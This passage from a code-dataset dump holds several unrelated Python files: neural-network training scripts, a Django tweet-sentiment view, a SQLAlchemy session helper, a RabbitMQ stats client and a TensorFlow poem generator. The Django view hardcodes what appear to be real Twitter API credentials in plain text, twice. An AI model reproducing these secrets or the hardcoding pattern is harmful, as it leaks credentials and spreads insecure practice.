'objective':'reg:linear'\n}\n","sub_path":"src/global_constraint.py","file_name":"global_constraint.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"122147729","text":"from numpy.lib.function_base import average\nfrom tensorflow.keras.layers.experimental import preprocessing\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow import keras\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\n\nclass GeneralANN:\n raw_data = pd.DataFrame()\n train_inp = pd.DataFrame()\n train_out = pd.DataFrame()\n test_inp = pd.DataFrame()\n test_out = pd.DataFrame()\n fraction = 0.0\n layers = []\n activation_functions = []\n normalizer = 0\n model_history = 0\n model = 0\n\n def define_layers(self, layers, functions):\n for layer, function in zip(layers, functions):\n self.layers.append(layer)\n self.activation_functions.append(function)\n\n def prepare_data(self, raw_data, inp, out, fraction=0.8):\n self.fraction = fraction\n dataset = raw_data.copy()\n self.raw_data = dataset\n train = dataset.sample(frac=fraction, random_state=0)\n self.train_inp = train[inp]\n self.train_out = train[out]\n test = dataset.drop(train.index)\n self.test_inp = test[inp]\n self.test_out = test[out]\n \n\n def normalize_data(self, show_example = False):\n\n self.normalizer = preprocessing.Normalization()\n self.normalizer.adapt(np.array(self.train_inp))\n first = np.array(self.train_inp[:1])\n\n if show_example:\n with np.printoptions(precision=2, suppress=True):\n print('First example:', first)\n print('Normalized:', self.normalizer(first).numpy())\n \n def build_and_compile_model(self, ann_layers, functions, eta=0.0001):\n if len(ann_layers)-1 != len(functions): \n print(\"wrong number of layers or activation functions!\")\n print(ann_layers)\n print(functions)\n arguments = [self.normalizer]\n for layer, function in zip(ann_layers[:-1], functions):\n arguments.append(layers.Dense(layer, activation=function))\n arguments.append(layers.Dense(ann_layers[-1]))\n \n self.model = keras.Sequential(arguments)\n self.model.compile(loss='mean_absolute_error',\n optimizer=tf.keras.optimizers.Adam(eta))\n\n def plot_loss(self):\n plt.plot(self.model_history.history['loss'], label='loss')\n y2 = max(self.model_history.history['val_loss'])\n y1 = min(self.model_history.history['val_loss'])\n plt.plot(self.model_history.history['val_loss'], label='val_loss')\n plt.ylim([0.8*y1, 1.1*y2])\n plt.xlabel('Epoch')\n plt.ylabel('Mean Absolute Error')\n plt.legend()\n plt.grid(True)\n plt.show()\n\n def print_weights(self):\n i = 0\n for layer in self.model.layers[1:]:\n i+=1\n for each in layer.get_weights()[0][:]:\n print(\"layer \",i, each)\n\n def plot_scheme(self):\n plot_model(self.model, to_file='model.png', show_shapes=True, show_dtype=False,\n show_layer_names=False, rankdir='TB', expand_nested=True, dpi=96)\n \n def train(self, batch = 10, epochs = 100):\n self.model_history = self.model.fit(self.train_inp, self.train_out, \n validation_split=0.2, batch_size=batch,\n verbose=2, epochs=epochs)\n\n def test(self, test_inp=0, test_out=0):\n print(\"**********************************************************************\")\n if test_inp==0:\n test_inp = self.test_inp\n test_out = self.test_out\n print(\"test on the %.2f %% of data, unused for training\" %((1-self.fraction)*100))\n test_results = 
self.model.evaluate(test_inp, test_out, verbose=1)\n print(\"test result: \", test_results)\n print(\"**********************************************************************\")\n\n\nif __name__ == '__main__':\n\n raw_dataset = pd.read_csv(\"data_RM.csv\",\n na_values=' ', comment='\\t',\n sep=',', skipinitialspace=True)\n\n inp = ['PAR', 'PK1', 'PK2', 'PK3', 'PK4', 'PK5', 'PK6']\n out = ['rho'] \n\n GANN = GeneralANN()\n GANN.prepare_data(raw_dataset, inp=inp, out=out, fraction=0.9)\n GANN.normalize_data(show_example = False)\n GANN.build_and_compile_model([100,50, 20, 1],['relu', 'relu', 'relu'], eta=0.0001)\n GANN.train(batch=100, epochs=1000)\n GANN.test()\n GANN.plot_loss()\n GANN.plot_scheme()\n\n\n","sub_path":"ANN-general.py","file_name":"ANN-general.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"61669813","text":"from ann import NeuralNetwork\nimport pandas as pd\nimport numpy as np\n\n\n# data preprocessing\ndf = pd.read_csv('dataset_NN.csv').sample(frac=1).to_numpy()\nfor i in [3, 5]: # normalize necessary data\n max, min = np.amax(df[:, i]), np.amin(df[:, i])\n df[:, i] = (df[:, i]-min)/(max-min)\n# convert classes from [1, ..., n] to [0, ...., n-1]\ndf[:, -1] = df[:, -1] - 1\n# split data to 70:30 ratio.\ntraindata, testdata = df[:int(0.7*df.shape[0])], df[int(0.7*df.shape[0]):]\n# split train and test data to features and target\ntrain_x, train_y = traindata[:, :-1], traindata[:, -1]\ntest_x, test_y = testdata[:, :-1], testdata[:, -1]\n\n\n# ANN with 1 hidden layer\n\nnn1 = NeuralNetwork(6)\nnn1.addLayer(8, 'tanh')\nnn1.addLayer(10, 'sigmoid')\nnn1.fit(train_x, np.atleast_2d(train_y).T,\n batch_size=5, max_epochs=700, lr=0.01)\nmpred = nn1.predict(test_x)\nmext = nn1.extend(test_y)\nmodelError = np.add(np.multiply(mext, np.log(mpred)),\n np.multiply(1-mext, np.log(1-mpred)))\nmodelError = -np.sum(np.sum(modelError, axis=1), axis=0)/test_x.shape[0]\nprint('Final test error', modelError)\n\n\nprint(\"\\n<<<<<<<<<<<<<<<< Accuracy >>>>>>>>>>>>>>>>>>\")\nprint(\"NN1 Test Accuracy \", nn1.accuracy(test_x, test_y))\nprint(\"NN1 Train Accuracy\", nn1.accuracy(train_x, train_y), \"\\n\")\n\n\n# ANN with two hidden layers\nnn2 = NeuralNetwork(6)\nnn2.addLayer(7, 'sigmoid')\nnn2.addLayer(9, 'sigmoid')\nnn2.addLayer(10, 'sigmoid')\nnn2.fit(train_x, np.atleast_2d(train_y).T,\n batch_size=5, max_epochs=700, lr=0.01)\nmpred = nn2.predict(test_x)\nmext = nn2.extend(test_y)\nmodelError = np.add(np.multiply(mext, np.log(mpred)),\n np.multiply(1-mext, np.log(1-mpred)))\nmodelError = -np.sum(np.sum(modelError, axis=1), axis=0)/test_x.shape[0]\nprint('Final test error', modelError)\n\n\nprint(\"\\n<<<<<<<<<<<<<<<< Accuracy >>>>>>>>>>>>>>>>>>\")\nprint(\"NN2 Test Accuracy \", nn2.accuracy(test_x, test_y))\nprint(\"NN2 Train Accuracy\", nn2.accuracy(train_x, train_y), \"\\n\")\n","sub_path":"Annexample.py","file_name":"Annexample.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"354771931","text":"from tkinter import StringVar, DoubleVar, IntVar, BooleanVar\n\n\ndef get_value_variable(values):\n\t\"\"\"\n\tGets the type of variable needed for Tkinter widgets.\n\n\tWill return the lowest common denominator variable for a value or list of\n\tvalues. For instance, if you have a list with both Strings and Integers,\n\tsimplegui cannot return an IntVar. 
If the user choose a String, there will\n\tbe an error.\n\n\tArgs:\n\t\t\tvalues (Mixed): The value(s) where you want the lowest common\n\t\t\tdenominator variable type.\n\n\tReturns:\n\t\t\tTkinter Variable\n\t\"\"\"\n\tif not isinstance(values, list):\n\t\tvalues = [values]\n\n\tvalueTypes = [type(value) for value in values]\n\n\tif str in valueTypes:\n\t\treturn StringVar()\n\telif float in valueTypes:\n\t\treturn DoubleVar()\n\telif int in valueTypes:\n\t\treturn IntVar()\n\telif bool in valueTypes:\n\t\treturn BooleanVar()\n\telse:\n\t\treturn StringVar()\n","sub_path":"simplegui/simplegui/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"549184175","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom tweepy import API, OAuthHandler\n\nfrom textblob import TextBlob\n\nfrom django.http import HttpResponse\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import api_view, permission_classes\n\nfrom rest_framework.response import Response\nfrom account.serializers import AccountSerializer\n\n\n# from API_KEYS import api_key, api_secret_key\n\ndef clean_tweets(tweet):\n tweet_words = str(tweet).split(' ')\n clean_words = [word for word in tweet_words if not word.startswith('#')]\n return ' '.join(clean_words)\n\n\ndef analyze(Topic):\n api_key = 'IToiFc5IxJa6Yg3raLFaXFSwg'\n\n api_secret_key = 'KqsUA65fTX48EArpnnwqvrH9n57IIbToYssfdUs9RFxRdjyUr6'\n\n positive_tweets, negative_tweets, all_tweets = [], [], []\n authentication = OAuthHandler(api_key, api_secret_key)\n api = API(authentication)\n public_tweets = api.search(Topic, count=1000)\n # add it\n all_tweets = [clean_tweets(tweet) for tweet in public_tweets] # clean_tweets(tweet.text)\n\n cleaned_tweets = [clean_tweets(tweet.text) for tweet in public_tweets] # clean_tweets(tweet.text)\n for tweet in cleaned_tweets:\n tweet_polarity = TextBlob(tweet).sentiment.polarity\n if tweet_polarity < 0:\n negative_tweets.append(tweet)\n continue\n positive_tweets.append(tweet)\n\n for tweet in negative_tweets:\n print(tweet)\n for tweet in positive_tweets:\n print(tweet)\n for tweet in all_tweets:\n print(tweet)\n\n return positive_tweets, negative_tweets, all_tweets\n\n\n# positive, negative = analyze('mohamed')\n# # print(positive , '\\n\\n', negative)\n# print(len(positive), ' VS ', len(negative))\n\n\n@api_view(['POST', ])\n@permission_classes([IsAuthenticated])\ndef get_tweets(request):\n topic = request.POST['topic']\n positive, negative, all_tweets = analyze(topic)\n data = {}\n\n data['negative_count'] = len(negative)\n data['positive_count'] = len(positive)\n data[\"positive\"] = positive\n data[\"negative\"] = negative\n data['all_tweets'] = all_tweets\n\n return Response(data)\n\n# @api_view(['GET', ])\n# @permission_classes([IsAuthenticated])\n# def search(request):\n# api_key = 'IToiFc5IxJa6Yg3raLFaXFSwg'\n#\n# api_secret_key = 'KqsUA65fTX48EArpnnwqvrH9n57IIbToYssfdUs9RFxRdjyUr6'\n#\n# authentication = OAuthHandler(api_key, api_secret_key)\n#\n# api = API(authentication)\n#\n# corona_tweets = api.search('corona virus')\n#\n# for tweet in corona_tweets:\n# text = tweet.text\n# print(text)\n# # return HttpResponse(text)\n# return Response(\"ok\")\n\n# search()\n","sub_path":"tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"616581641","text":"from os import environ\n\nfrom contextlib import contextmanager\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom models import Base\n\nDB_URL = environ.get(\"DATABASE_URL\", \"mysql+pymysql://db_user:db_password@db/db_name\")\nENGINE = create_engine(DB_URL)\n\n# The class to use for all sessions\nSession = sessionmaker(bind=ENGINE)\n\n\n@contextmanager\ndef scoped_session():\n \"\"\"Provide a transactional scope around a series of operations.\"\"\"\n session = Session()\n\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.expunge_all()\n session.close()\n\n\ndef init_db():\n \"\"\"Initialize DB schema\"\"\"\n Base.metadata.create_all(bind=ENGINE, checkfirst=True)\n\n\ndef teardown_db():\n \"\"\"Drop all tables in DB\"\"\"\n Base.metadata.drop_all(bind=ENGINE, checkfirst=True)\n","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"389715031","text":"p = int(input()) \na=0\nif p>=90:\n a=\"expert\"\nelif p<90 and p>=70:\n a=90-p\n \nelif p<70 and p>=40:\n a=70-p \nelse:\n a =40-p\nprint(a)\n\n\n","sub_path":"Biginer_Contest_219/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"261373229","text":"#!/usr/bin/python\n\nimport requests\n\n\nclass RabbitMQStats:\n\n def __init__(self, host, port, url, user, pwd, is_https=False):\n self.host = host\n self.port = port\n self.base_url = url\n self.username = user\n self.password = pwd\n self.scheme = 'https' if is_https else 'http'\n\n def get_overview(self):\n body = self._request('/overview')\n return body\n\n def get_nodes(self, memory=False, binary=False, health=False):\n nodes = self._request('/nodes')\n body = []\n for node in nodes:\n if memory or binary:\n node = self.get_node_details(node['name'], memory, binary)\n if health:\n node['health'] = self.get_node_health(node['name'])\n body.append(node)\n return body\n\n def get_node_details(self, node_name, memory=True, binary=False):\n body = self._request('/nodes/%s?memory=%s&binary=%s' % (node_name, str(memory).lower(), str(binary).lower()))\n return body\n\n def get_node_health(self, node_name):\n body = self._request('/healthchecks/node/%s' % (node_name))\n return body\n\n def get_queues(self):\n body = self._request('/queues')\n return body\n\n def get_queue_detailed(self, queue_name):\n return self._request('/queues/{0}/{1}'.format(self.username, queue_name))\n\n def get_listeners(self):\n overview = self.get_overview()\n listeners_by_node = {}\n for listener in overview['listeners']:\n if listener['node'] not in listeners_by_node:\n listeners_by_node[listener['node']] = []\n listeners_by_node[listener['node']].append(listener)\n return listeners_by_node\n\n def get_partitions(self):\n nodes = self.get_nodes()\n partitions = []\n for node in nodes:\n partitions.extend(node['partitions'])\n return partitions\n\n def get_applications(self):\n nodes = self.get_nodes()\n applications = {}\n for node in nodes:\n for application in node['applications']:\n applications[application['name']] = application\n return applications\n\n def _request(self, path):\n try:\n r = requests.get('{0}://{1}:{2}{3}{4}'.format(self.scheme, self.host, self.port, self.base_url, path),\n auth=(self.username, self.password))\n except Exception as 
e:\n print('_request: {0}'.format(e))\n return {}\n return r.json()\n","sub_path":"rabbitmq_stats/RabbitMQStats.py","file_name":"RabbitMQStats.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"246293865","text":"from __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nimport re\nimport language_check\n\nimport argparse\nimport os\nfrom six.moves import cPickle\n\nfrom model import Model\nimport sys\nimport datamuser\nimport random\nimport string\nimport metaphor as meta\n\nTAYLOR = False\ntry:\n if os.environ[\"COMPUTERNAME\"] == 'DALAILAMA':\n TAYLOR = True\nexcept:\n TAYLOR = False\n\n# Sterling's globals\nsave_dir = 'save'\n\nif TAYLOR:\n save_dir = r\"./save/MASTER\"\n #save_dir = r\"./save/FINAL\"\n\nTOP_TOPIC_WORDS = 10\nTOP_VOCAB_WORDS = 5000\nNUM_OF_SAMPLES = 10\n\nclass PoemWriter():\n\n def __init__(self, save_dir='save', n=20, prime = ' ', count = 1, end_word = \"turtle\", output_path = \"sample.txt\", internal_call = False, model = None, syllables = 10, pick = 1, use_topics = False, sample_type=1):\n\n if pick == 1:\n self.number_of_samples = NUM_OF_SAMPLES\n else:\n self.number_of_samples = 1\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save_dir', '-s', type=str, default=save_dir,\n help='model directory to load stored checkpointed models from')\n parser.add_argument('-n', type=int, default=n,\n help='number of words to sample')\n parser.add_argument('--prime', type=str, default=prime,\n help='prime text')\n parser.add_argument('--pick', type=int, default=1,\n help='1 = weighted pick, 2 = beam search pick')\n parser.add_argument('--width', type=int, default=5,\n help='width of the beam search')\n parser.add_argument('--sample', type=int, default=sample_type,\n help='0 to use max at each timestep, 1 to sample at each timestep, 2 to sample on spaces')\n parser.add_argument('--count', '-c', type=int, default=count,\n help='number of samples to print')\n parser.add_argument('--quiet', '-q', default=False, action='store_true',\n help='suppress printing the prime text (default false)')\n parser.add_argument('--end_word', '-e', default=end_word,\n help='Last word of line')\n parser.add_argument('--output_path', '-o', default=output_path,\n help='Last word of line')\n parser.add_argument('--syllables', '-y', default=syllables,\n help='Last word of line', type=int)\n parser.add_argument('--use_topics', '-t', default=use_topics,\n help='Use topic words', type=bool)\n\n self.args = parser.parse_args(\"\")\n\n path = os.path.join(self.args.save_dir, 'config.pkl')\n with open(path, 'rb') as f:\n saved_args = cPickle.load(f)\n saved_args.use_topics=self.args.use_topics\n\n main_path = os.path.join(self.args.save_dir, 'words_vocab.pkl')\n freq_path = os.path.join(self.args.save_dir, 'words_vocab_freq.pkl')\n\n self.words_freq, self.vocab_freq = self.open_pickle(freq_path)\n self.words, self.vocab = self.open_pickle(main_path)\n\n self.model = Model(saved_args, True)\n self.freq_words = set(self.words_freq[0:TOP_VOCAB_WORDS ])\n\n def open_pickle(self, path):\n with open(path, 'rb') as f:\n if sys.version_info[0] >= 3:\n words, vocab = cPickle.load(f, encoding='latin-1')\n else:\n words, vocab = cPickle.load(f)\n return words, vocab\n\n\n def evaluate_line(self, line):\n return True # for now\n\n def strip_punc(self, s):\n table = str.maketrans({key: None for key in string.punctuation})\n new_s = s.translate(table) # Output: string without 
punctuation\n return new_s\n\n def cap(self, match):\n return match.group().upper()\n\n def clean_poem(self, poem_list):\n print(\"cleaning poem\")\n for i, l in enumerate(poem_list):\n l = l.strip()\n l = l.replace(\"- \", \"-\")\n l = l.replace(\" i \", \" I \")\n l = l[0].upper() + l[1:]\n l = re.sub(\"(\\. [a-z])\", self.cap, l)\n poem_list[i] = l\n return poem_list\n\n def correct_grammar(self, poem):\n tool = language_check.LanguageTool('en-US')\n matches = tool.check(poem)\n for i in matches:\n print(matches[i])\n new_poem = language_check.correct(poem, matches)\n return new_poem\n\n def write_out_poem(self, poem, path=None):\n output_path = self.args.output_path\n if not output_path is None:\n if not os.path.isdir(output_path):\n output_path = os.path.join(self.args.save_dir, output_path)\n with open(output_path, \"a\") as f:\n f.write('\\n\\n')\n # for item in text_list:\n # f.write(item)\n f.write(poem)\n\n def sample(self, num_syllables, num_lines, topic_word, custom_rhyme = [], related_words=[], metaphor = \"\"):\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n saver = tf.train.Saver(tf.global_variables())\n ckpt = tf.train.get_checkpoint_state(self.args.save_dir)\n text_list = []\n\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n continuous = True\n while continuous:\n print(\"Syllables: {}\".format(num_syllables))\n print(\"Topic: {}\".format(topic_word))\n print(\"Custom Rhyme: {}\".format(custom_rhyme))\n print(\"Related Words: {}\".format(related_words))\n print(\"Metaphor: {}\".format(metaphor))\n print(\"Prime: {}\".format(self.args.prime))\n if topic_word == \"\":\n related_words = [\"\\n\"]\n else:\n related_words_muse = datamuser.get_all_related_words(topic_word.split(), TOP_TOPIC_WORDS)\n # Get related words\n if metaphor != \"\":\n related_words = meta.main(metaphor, 10, False) + related_words_muse\n elif related_words == []:\n related_words = related_words_muse\n\n if type(related_words) == type([]):\n related_words = set(related_words)\n print(related_words)\n topic_words = list(related_words.intersection(self.freq_words))\n if len(topic_words) == 0:\n raise ValueError(\"No vocab words related to topic\")\n print (topic_words)\n\n # Do priming\n prime = \"\"\n if self.args.prime == \"\":\n if metaphor != \"\":\n prime = metaphor\n else:\n for ii in range(0, int(num_syllables/2)):\n prime += random.choice(topic_words) + \" \"\n else:\n prime = self.args.prime\n\n if prime[-1] != \"\\n\":\n prime += \".\\n\"\n\n \"\"\"print(\"Pre-prime: {}\".format(prime))\n # make sure prime words are valid\n p = prime.lower()\n p = p.replace(\"\\n\", \"|\")\n p = [x for x in p.split() if x in self.words]\n prime = \" \".join(p).replace(\"|\", \"\\n\")\"\"\"\n\n # prime = '{} {} {}\\n'.format(topic_word, topic_word, topic_word)\n quiet = True\n poem_lines = []\n print(\"Prime {}\".format(prime))\n i = 0\n while i < num_lines:\n # get endword\n if metaphor != \"\":\n pass\n #all_words = meta.main(metaphor, 1000, True)\n #all_words = meta.main(metaphor, 10, True)\n #datamuser.find_rhyming_pairs(all_words)\n #print(all_words)\n if i % 2 == 0 and custom_rhyme == []:\n # pick random topic word\n end_word = random.choice(topic_words)\n #end_word = \"\\n\"\n else:\n # rhyme with last line\n if custom_rhyme != []:\n last_word = custom_rhyme[i % len(custom_rhyme)]\n\n # don't try to rhyme if doing a metaphor\n if metaphor == \"\" or True:\n rhymes = list(datamuser.get_rhymes(last_word, 
weak_rhymes=False).intersection(self.freq_words))\n else: # don't get rhymes, just topic words\n rhymes = list(related_words_muse.intersection(self.freq_words))\n\n # print (len(rhymes))\n if len(rhymes)==0: end_word = \"\\n\" #random.choice(topic_words)\n else: end_word = random.choice(rhymes)\n # print('LAST WORD: {} END WORD: {}'.format(last_word, end_word))\n\n temp_topic_word = random.choice(topic_words)\n print(\"Topic influencer {}\".format(temp_topic_word))\n # print ('END WORD: {}'.format(end_word))\n # end_word = 'flag'\n\n candidate_lines = []\n scores = []\n self.args.sample = 1\n print (\"GENERATING A NEW LINE -- SAMPLING SOME CANDIDATES -- END WORD {}\".format(end_word))\n for j in range(self.number_of_samples): # get best of 10 lines\n line, score = self.model.sample(sess, self.words, self.vocab, self.args.n,\n prime, self.args.sample, self.args.pick,\n self.args.width, quiet, end_word, num_syllables, True, topic_word=temp_topic_word)\n # quiet = True\n # line = lines[len(prime):].split('\\n')[0] # strip off prime and keep next single line\n candidate_lines.append(line)\n scores.append(score)\n # print (\"LINE: {} SCORE: {}\".format(lines, score))\n\n print(scores)\n print(np.argmax(scores))\n if scores[np.argmax(scores)] == -40:\n print(candidate_lines)\n continue\n\n line = candidate_lines[np.argmax(scores)]\n # if len(line) < 15:\n # # bad line, too short\n # i -= 1\n # continue\n count = lambda l1, l2: len(list(filter(lambda c: c in l2, l1)))\n if count(line, string.punctuation) > 6:\n # bad line, too much punctuation\n continue\n\n last_word = self.strip_punc(line.split()[-1])\n\n\n try:\n if not last_word.isalpha(): last_word = line.split()[-2]\n except IndexError:\n continue\n\n if not last_word.isalpha():\n # bad line, ends in multiple punctuations\n continue\n\n #for ii, l in enumerate(candidate_lines):\n # print(l, scores[ii])\n\n print(\"CHOSEN LINE::: {}\".format(line), score)\n if end_word == \"\\n\":\n end_word = r\"\\n\"\n tag = \" ({} -> {}) \".format(temp_topic_word, end_word)\n poem_lines.append(line + tag)\n prime += (line + '\\n')\n\n i += 1\n\n #poem = prime[len(orig_prime):]\n poem_lines = self.clean_poem(poem_lines)\n poem = \"\\n\".join(poem_lines)\n #poem = self.correct_grammar(poem)\n print (\"\\n\\nLINES WRITTEN BY GRAMPS\\n{}\".format(poem))\n self.write_out_poem(poem)\n\n if True:\n topic_word = input(\"Topic?\")\n new_prime = input(\"Prime?\")\n metaphor = input(\"Metaphor?\")\n related_words = [] # reset this\n if new_prime == \"same\":\n pass\n else:\n self.args.prime = new_prime\n\n #continuous = False\n\n def write_poems(self, topics, n, filename):\n\n syllables = 8\n lines = 4\n\n outfile = open(filename, 'a')\n for topic in topics:\n outfile.write('TOPIC: {}\\n'.format(topic.upper()))\n for i in range(n):\n poem = self.sample(syllables, lines, topic)\n outfile.write('Poem {}. 
\\n{}\\n'.format(i, poem))\n\n\n outfile.close()\n\n\ndef copy_a_poem():\n PRIME = \"\"\"Two roads diverged in a yellow wood,\n And sorry I could not travel both\n And be one traveler, long I stood\n And looked down one as far as I could\n To where it bent in the undergrowth;\n\n Then took the other, as just as fair,\n And having perhaps the better claim,\n Because it was grassy and wanted wear;\n Though as for that the passing there\n Had worn them really about the same,\n\n And both that morning equally lay\n In leaves no step had trodden black.\n Oh, I kept the first for another day!\n Yet knowing how way leads on to way,\n I doubted if I should ever come back.\n\n I shall be telling this with a sigh\n Somewhere ages and ages hence:\n Two roads diverged in a wood, and I\"\"\"\n RHYME = [\"sigh\", \"hence\"]\n RELATED_WORDS = []\n METAPHOR = \"\"\n args.n_syllables = 9\n args.topic = \"\"\n pw = PoemWriter(save_dir=save_dir, prime=PRIME, pick=1)\n pw.sample(args.n_syllables, args.n_lines, args.topic, custom_rhyme=RHYME, related_words=RELATED_WORDS,\n metaphor=METAPHOR)\n\n\ndef generate_new_poem(args):\n PRIME = \"creamy milky kurds and feta cheese,\\n\"\n PRIME = \"\"\n args.topic = \"road\"\n\n RHYME = []\n args.topic = \"cheese\"\n PRIME = args.topic\n RELATED_WORDS = [\"creamey\", \"cheesy\", \"milk\", \"gooey\", \"cheddar\", \"feta\", \"culture\", \"cheese\", \"mold\", \"food\", \"delicious\", \"flavour\"]\n RELATED_WORDS = [\"cheese\", \"food\", \"delicious\", \"flavour\"]\n RELATED_WORDS = []\n\n METAPHOR = r\"marriage as death\"\n METAPHOR = r\"student as beggar\"\n #METAPHOR = r\"child as tempest\"\n args.topic = \"student\"\n PRIME=\"\"\n\n pw = PoemWriter(save_dir=save_dir, prime=PRIME, pick=1)\n pw.sample(args.n_syllables, args.n_lines, args.topic, custom_rhyme=RHYME, related_words=RELATED_WORDS, metaphor=METAPHOR)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--topic', '-t', type=str, default='cheese',\n help='topic word for poem')\n parser.add_argument('--n_lines', '-l', type=int, default=4,\n help='number of lines to generate')\n parser.add_argument('--n_syllables', '-s', type=int, default=8 ,\n help='number of syllables per line')\n\n args = parser.parse_args()\n generate_new_poem(args)\n #copy_a_poem()\n if False:\n pw = PoemWriter(save_dir = save_dir, prime= PRIME, pick=1)\n pw.sample(args.n_syllables, args.n_lines, args.topic, custom_rhyme=RHYME, related_words=RELATED_WORDS, metaphor=METAPHOR)\n\n\"\"\"Do not go gentle into that good night,\nOld age should burn and rave at close of day;\nRage, rage against the dying of the light.\n\nThough wise men at their end know dark is right,\nBecause their words had forked no lightning they\nDo not go gentle into that good night.\n\nGood men, the last wave by, crying how bright\nTheir frail deeds might have danced in a green bay,\nRage, rage against the dying of the light.\n\nWild men who caught and sang the sun in flight,\nAnd learn, too late, they grieved it on its way,\nDo not go gentle into that good night.\n\nGrave men, near death, who see with blinding sight\nBlind eyes could blaze like meteors and be gay,\nRage, rage against the dying of the light.\n\nAnd you, my father, there on the sad height,\nCurse, bless, me now with your fierce tears, I pray.\nDo not go gentle into that good night.\n\"\"\"\n\n\n\"\"\"=======\n pw = PoemWriter(sample_type=0)\n # pw.sample(args.n_syllables, args.n_lines, args.topic)\n\n# topics = ['cheese',\n# 'furniture',\n# 'animals',\n# 'bear',\n# 
'basketball',\n# 'soccer',\n# 'woman',\n# 'man',\n# 'map',\n# 'anger',\n# 'rejoice',\n# 'sandwich',\n# 'history',\n# 'convertibles',\n# 'flower',\n# 'dirt',\n# 'friendship',\n# 'poetry',\n# 'hardship',\n# 'heaven', # 20 => 1.5 hours\n# ]\n topics = [\n # 'night',\n # 'virtue',\n # 'Rome',\n 'sky',\n 'creativity',\n 'desert',\n 'challenge',\n 'darkness',\n 'light',\n 'jupiter',\n 'taxes',\n 'immigration',\n 'ocean',\n 'pirate',\n 'darwin',\n 'texas',\n 'beauty',\n 'knight',\n 'marriage',\n 'magic' # 40 => 4 hours?\n ]\n\n N = 5\n pw.write_poems(topics, N, 'outputs/volume3.txt')\n>>>>>>> 814b49a8ba62f3de50b7c1972b7ad33dcdb2ab76\n\"\"\"","sub_path":"poem_writer.py","file_name":"poem_writer.py","file_ext":"py","file_size_in_byte":18233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"571638864","text":"# coding=utf-8\n# Copyright 2022 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Data loader for FMoW dataset.\"\"\"\n\nfrom gift.data import base_dataset\nfrom gift.data.builders import fmow_builder\n\n\nclass Fmow(base_dataset.MutliEnvironmentImageDataset):\n \"\"\"Data loader for FMoW.\"\"\"\n\n _ALL_ENVIRONMENTS = ['train', 'val_id', 'val_ood', 'test_id', 'test_ood']\n\n @property\n def name(self):\n return 'fmow'\n\n def get_builder(self, name):\n return fmow_builder.Fmow(data_dir='PATH_TO_DATA')\n\n def set_static_dataset_configs(self):\n self._channels = 3\n train_splits = {}\n for env in self.train_environments:\n train_splits[env] = f'{env}'\n\n test_splits = {}\n valid_splits = {}\n for env in self.eval_environments:\n valid_splits[env] = f'{env}'\n test_splits[env] = f'{env}'\n\n self._splits_dict = {\n 'train': train_splits,\n 'test': test_splits,\n 'validation': valid_splits\n }\n self._crop_padding = 32\n self._mean_rgb = [0.485, 0.456, 0.406]\n self._stddev_rgb = [0.229, 0.224, 0.225]\n self.resolution = self.resolution or 224\n self.resize_mode = 'resize'\n self.data_augmentations = self.data_augmentations or ['center_crop']\n self.teacher_data_augmentations = self.teacher_data_augmentations or [\n 'center_crop'\n ]\n self.eval_augmentations = ['center_crop']\n self.if_cache = True\n\n def get_tfds_env_name(self, name):\n return name\n\n def get_tfds_ds_and_info(self, name, data_range):\n del name\n ds = self.builder.as_dataset(split=data_range)\n\n return ds, self.builder.info\n\n def get_num_classes(self):\n return self.builder.info.features['label'].num_classes\n","sub_path":"gift/data/fmow.py","file_name":"fmow.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"486648817","text":"from io import StringIO\nfrom PIL import Image\nimport urllib.request, urllib.parse, urllib.error\nimport json\n\ndef getMap(google_key, search, width=150, height=100, zoom=4):\n try:\n url = \"https://maps.googleapis.com/maps/api/geocode/json?key=\" + google_key + \"&address=\" + search\n geo = 
